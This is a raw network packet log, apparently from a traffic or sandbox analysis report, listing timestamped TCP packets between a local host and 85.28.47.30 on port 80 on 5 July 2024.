                                                                Jul 5, 2024 04:36:00.243730068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243753910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243772030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243778944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243793964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243801117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243809938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243822098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243834972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243837118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243844032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243853092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243868113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243877888 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243884087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243892908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243902922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243911028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243920088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243947983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243963003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.243995905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244004011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244012117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244031906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244038105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244045973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244052887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244069099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244075060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244083881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244107962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244231939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244246006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244262934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244273901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244292974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244298935 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244322062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244337082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244353056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244365931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244369030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244374990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244398117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244405031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244448900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244468927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244492054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244501114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244514942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244529963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244545937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244560003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.244585991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.244595051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253308058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253338099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253351927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253362894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253370047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253371000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253386974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253396034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253402948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253427982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253428936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253444910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253468990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253480911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253540993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253563881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253581047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253588915 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253597975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253603935 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253614902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253619909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253633022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253645897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253648996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253657103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253674984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253684044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253741026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253753901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253777027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253781080 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253791094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253813028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253815889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253829002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253844023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253851891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253861904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253863096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253884077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253906965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.253947020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.253983974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254005909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254020929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254045010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254059076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254084110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254098892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254113913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254123926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254129887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254137039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254153013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254169941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254173994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254189014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254204035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254215956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254230022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254242897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254400969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254416943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254432917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254456997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254461050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254477024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254481077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254493952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254509926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254512072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254528999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254528999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254573107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254607916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254632950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254648924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254648924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254667044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254672050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254683018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254684925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254702091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254705906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254719973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254724979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254734993 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254738092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254756927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254757881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254774094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254776955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254791021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.254791975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254816055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.254833937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.255083084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.255105019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.255120993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.255136967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.255145073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.255148888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.255155087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.255165100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.255182028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.255191088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.255199909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.255202055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.255215883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.255220890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.255240917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.255248070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.328896999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.328912020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.328927994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.328973055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329004049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329062939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329077959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329092979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329108000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329111099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329123974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329127073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329140902 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329140902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329159021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329160929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329168081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329175949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329184055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329204082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329210997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329217911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329226971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329243898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329247952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329273939 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329273939 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329391956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329406977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329421043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329437017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329447031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329467058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329534054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329550028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329565048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329575062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329581022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329590082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329607964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329617977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329699039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329713106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329727888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329741955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329751968 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329756975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329776049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.329782963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329792023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.329819918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.330003023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.330054045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.335479021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335495949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335541010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.335629940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335645914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335686922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.335797071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335813046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335828066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335834026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335841894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335858107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.335860968 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.335890055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.335911036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.335985899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336004019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336019039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336035967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336036921 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336045980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336065054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336075068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336122036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336144924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336160898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336160898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336175919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336185932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336194038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336204052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336209059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336220026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336236954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336245060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336255074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336271048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336298943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336308002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336461067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336476088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336503983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336512089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336528063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336539030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336617947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336632967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336673021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336684942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336782932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336812019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.336833954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.336847067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345390081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345406055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345421076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345436096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345534086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345560074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345575094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345591068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345604897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345608950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345624924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345637083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345642090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345664024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345664978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345674992 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345696926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345705032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345716953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345736980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345741987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345751047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345752001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345777988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345808029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.345871925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.345931053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346039057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346052885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346070051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346081018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346085072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346095085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346102953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346115112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346118927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346128941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346136093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346151114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346160889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346165895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346180916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346189976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346199036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346205950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346224070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346232891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346239090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346252918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346256971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346262932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346286058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346299887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346491098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346514940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346534014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346555948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346647024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346662998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346677065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346694946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346697092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346708059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346726894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346739054 CEST4973080192.168.2.485.28.47.30
